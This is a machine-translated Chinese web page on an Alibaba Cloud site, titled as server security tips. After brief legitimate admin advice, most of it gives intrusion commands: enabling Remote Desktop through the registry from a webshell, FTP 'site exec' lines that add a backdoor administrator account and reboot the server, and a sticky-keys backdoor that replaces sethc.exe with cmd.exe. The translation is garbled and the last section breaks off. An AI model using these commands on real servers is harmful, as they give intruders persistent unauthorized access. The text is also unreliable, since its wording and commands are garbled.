Server Security Tutorials

Source: Internet
Author: User
Tags delete key

"Miscellaneous Tips" Server security tutorial

One. Change the server default user name

Click Start menu → run gpedit.msc (Group Policy manager) → Computer Configuration →windows settings → security settings → Local policies → security options → Here's the last item → Rename the system administrator account (double-click) → in the local policy settings, enter the username you want, then OK.

Two. Change server password

To remotely modify the server's user password, there are three methods, as follows:

First, select "My Computer"-right button "manage"-"Local Users and Groups"-"user" to find your administrator account, right-click to set the password. That prompts windows with a security warning that doesn't affect your use. If you are really worried about data loss, then it is recommended that you restart your computer after you change it so that you can make sure that you do not lose it after you change your password.

Second, start->windows security, so it is as if the Remote desktop simultaneously pressed
The Ctrl+atl+del effect is the same, point change password, only so that the NTFS file system encryption information will not be lost.

Third, press the Ctrl+alt+end key instead of the Ctrl+alt+delete key.

It is recommended to use the second and third methods to open account management directly and then change the password, which is what you do when you forget your password.

 

three. Webshell Logoff System User method

First, enter the ID of the user to query
Then enter log out of the user. Logoff ID

Four. CMD to open the 3389 command

Method One: REG ADD hklm\system\currentcontrolset\control\terminal "" Server/v fdenytsconnections/t reg_dword/d 00000000/f

Method Two: Build the bat file, type the following code, run on the server with EXECUTE permission!

echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "Fdenytsconnections" =dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\wds\rdpwd\tds\tcp]>>3389.reg
echo "PortNumber" =dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\winstations\rdp-tcp]>>3389.reg
echo "PortNumber" =dword:00000d3d>>3389.reg
REGEDIT/S 3389.reg
Del 3389.reg

Five. Webshell See what the administrator has changed to 3389

REG query Hklm\system\currentcontrolset\control\terminal "" Server\winstations\rdp-tcp/v portnumber This command is to see how much of the port opened by Remote Desktop Connection is generally the default display is 0xd3d 3389.

In fact, the two commonly-used CMD commands can be finalized.

First Use
Tasklist/svc

Image name PID Service
========================= ====== =============================================
System Idle Process 0 N/A
System 4 N/A
Smss.exe 704
Csrss.exe 772
Winlogon.exe 796
Services.exe 840 Eventlog, Plugplay
Lsass.exe 852 PolicyAgent, ProtectedStorage, SAMSS
Svchost.exe 1028 Dcomlaunch, TermService,//Here TermService is the response of the 3389 service, remember the process of the PID : 1028
Svchost.exe 1092 RpcSs
Svchost.exe 1180 Audiosrv, Browser, Cryptsvc, Dhcp, Dmserver,
EventSystem, Fastuserswitchingcompatibility,
LanManServer, LanmanWorkstation, Netman,
Nla, RasMan, Seclogon, SENS, SharedAccess,
ShellHWDetection, TAPISRV, Themes, Trkwks,
W32Time, WinMgmt, Wscsvc, Wuauserv, WZCSVC
Svchost.exe 1260 DnsCache
Svchost.exe 1336 LmHosts, SSDPSRV, WebClient
Spoolsv.exe 1416 Spooler
Explorer.EXE 1788
Vsnpstd3.exe 1948
Egui.exe 1968
Ctfmon.exe 2044
Ekrn.exe 484 EKRN
Svchost.exe 604 stisvc
Wdfmgr.exe 620 UMWDF
Alg.exe 324 ALG
Iexplore.exe 2552
Cmd.exe 2236
Conime.exe 124
Wmiprvse.exe 292
Mstsc.exe 3580
Tasklist.exe 188
====================================================================================================
Then use the netstat command to view the port number:

Netstat/ano

Active Connections
Proto Local Address Foreign address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5389 0.0.0.0:0 LISTENING 1028//This is the upper PID number 1028, which is the Remote Desktop-response port 5389.
TCP 60.xxx.xxx.xxx:1349 220.xxx.xxx.xxx:8081 time_wait 0
TCP 60..xxx.xxx.xxx::1360 121.xxx.xxx.xxx:8449 time_wait 0
TCP 60..xxx.xxx.xxx::1525 121.xxx.xxx.xxx:80 time_wait 0
TCP 127.0.0.1:1030 0.0.0.0:0 LISTENING 324
TCP 127.0.0.1:1522 127.0.0.1:30606 time_wait 0
TCP 127.0.0.1:30606 0.0.0.0:0 LISTENING 484
TCP 127.0.0.1:30606 127.0.0.1:1520 time_wait 0
TCP 192.168.1.12:139 0.0.0.0:0 LISTENING 4
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 852
UDP 0.0.0.0:4500 *:* 852
UDP 60.xxx.xxx.xxx::123 *:* 1180
UDP 60.xxx.xxx.xxx::1900 *:* 1336
UDP 127.0.0.1:123 *:* 1180
UDP 127.0.0.1:1047 *:* 2552
UDP 127.0.0.1:1900 *:* 1336
UDP 192.168.1.12:123 *:* 1180
UDP 192.168.1.12:137 *:* 4
UDP 192.168.1.12:138 *:* 4
UDP 192.168.1.12:1900 *:* 1336
C:\>

six. FTP cmd series Command

Quote site EXEC NET user 381400744 381400744/add Add user

Quote site EXEC net localgroup Administrators 381400744/add user 381400744 to admin!

Quote site exec shutdown-r-T 0 remote restart Server

Quote site exec REG ADD hklm\system\currentcontrolset\control\terminal "" server/v fdenytsconnections/t reg_dword/d 0000 0000/f Remote open 3389 port

Quote site Exec tasklist/svc>>jilu.txt These two sentences, remote view administrator to change 3389 port to how much, automatically saved as a file named Jilu.txt!
Quote site EXEC Netstat/ano>>jilu.txt


Seven, summary of the classic right to mention skills

Method 1: Replace CMD and sethc directly with the shift backdoor call CMD

Copy%systemroot%\system32\cmd.exe%systemroot%\system32\sethc.exe/y
Copy%systemroot%\system32\sethc.exe%systemroot%\system32\dllcache\sethc.exe/y

After entering the login interface: Call Desktop Explorer

Server Security Tutorials

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.